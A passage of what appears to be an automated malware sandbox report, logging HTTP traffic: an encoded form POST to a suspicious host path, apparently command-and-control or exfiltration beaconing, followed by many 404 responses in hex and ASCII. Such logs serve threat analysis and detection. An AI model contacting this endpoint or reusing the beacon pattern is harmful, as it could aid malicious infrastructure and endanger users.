                Source: unknownHTTP traffic detected: POST /dj43/ HTTP/1.1Host: www.mylivingbio.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateOrigin: http://www.mylivingbio.onlineCache-Control: no-cacheContent-Length: 195Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.mylivingbio.online/dj43/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; LIFETAB_P891X Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Safari/537.36Data Raw: 53 44 43 78 48 58 3d 4a 6d 69 49 76 53 56 6c 32 66 56 48 58 36 57 41 53 33 35 39 4a 2f 55 4a 39 72 35 77 4d 50 4b 42 45 66 65 4a 52 57 50 41 65 74 50 58 76 58 51 52 33 47 47 7a 51 59 2f 33 76 38 2f 46 31 35 76 30 69 30 4d 30 34 4c 4d 58 72 67 33 32 59 66 65 6c 30 52 62 68 72 47 6d 65 58 51 62 30 43 75 59 48 6d 63 6a 76 59 71 75 52 4c 65 44 31 57 7a 73 32 62 79 61 42 78 56 31 58 46 41 49 2f 39 39 33 68 67 4a 6a 4b 74 64 35 61 68 74 69 35 6c 6f 35 4f 7a 4c 45 46 42 4d 59 38 50 51 6b 62 61 7a 41 4b 6d 6f 70 66 5a 49 6a 49 4a 32 77 71 35 34 65 4d 50 67 2f 6f 64 43 58 65 4d 5a 75 52 Data Ascii: SDCxHX=JmiIvSVl2fVHX6WAS359J/UJ9r5wMPKBEfeJRWPAetPXvXQR3GGzQY/3v8/F15v0i0M04LMXrg32Yfel0RbhrGmeXQb0CuYHmcjvYquRLeD1Wzs2byaBxV1XFAI/993hgJjKtd5ahti5lo5OzLEFBMY8PQkbazAKmopfZIjIJ2wq54eMPg/odCXeMZuR
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 10 Mar 2025 08:27:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:27:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oqDYaPerghhHvnKKaYFUnQoMi8Ms64suFGJSY2y7FlnerEO3yDWNsz%2F7KAKGvNgdSf9j1cffLN502W0iRbA4MC%2FXzmGUSFtdb8kltHbXDPHUZ3gRdTCTEh5S25HmHG28"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e16ef20a6cfbfb-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1637&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=114&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:27:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNv6zPadfRB28oS7oY5MAwcAVCVsm8XTJmTa6GTjzyj9%2Bhcoc2ae5L1aehD8bU2ohj3igRT6I79sfUZ4Z%2Fa6dSpDuUfoQRg2%2BSyJ3LolCY%2B%2F1SulNlZSrHg%2FJ8oaRtaG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e16f01f97d1869-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1592&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:27:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1QpB3Faj1mit4hp%2BDMa3KUsZEkJ4XG3IMTinXDiHkYFJTARTE5x5A1bHXH7xxEvFzvPQpK%2BIWKEzqukrFnOkqpjZPuR1Bycr9csAmj5fkGE2AqeuiRLSllpf2M9IRMbw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e16f11ea590ee6-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1596&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=954&delivery_rate=0&cwnd=98&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:27:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n8qBF4WN%2FiCCD3RDrlGO70VMOqgSaGPTrfb6Pz4CjPQlvbjSoiwx2wGTwvXn9%2FK9HRpmCWn8vlBlrZ45%2Fr5nDoFZ4L8VBwyEFHzk0MZdeyGE2gUXtTeljumpuYmj5mdL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e16f21dad84322-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2013&rtt_var=1006&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=526&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly err
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:27:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:27:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:27:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:27:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:27:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EVnX2egvGuXqilH0fRndCeOmutYP8IGliitKuTvaDB6RwGRsjJ%2FknlF1Tup5PUDKWgxg7ZKNxGDeqkQm35E6Rg1LIYYxbgLi0ZySXY1%2BaDWAUD%2BxW0x%2BVciLJ2QdbTi3ETx5P7CKww%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e16f9c1d438c3f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1778&rtt_var=889&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=791&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:28:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YFKGUqixeK4KTdtw8%2FvhKd0rF290BzGPJgwkkWUzcEA4buSqg7Nkysd66plS8Fi6N99O1nLEmYyOJ452mww9nexpEtUMtOEoMGXQvLbNZnLX0ryQ8crAKjC%2BKGtoQmu9KNkAE0436Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e16fac2f2716f7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2798&min_rtt=2798&rtt_var=1399&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=117&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:28:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BcJf6PyfM6q4BIb4TjgtjSlsIYRfe6yPZCEyWxYluYbOBvAG%2FWA4rSpuxeymbQhdOEhY4WanDYN0Nvk0wjUUqT08DBPvbGW9bgefLC3IX9pZeQO7wP3Sd65Qz3%2FsLMl5cvn9xw2Ejg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e16fbbfb6a425d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2131&min_rtt=2131&rtt_var=1065&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=975&delivery_rate=0&cwnd=152&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 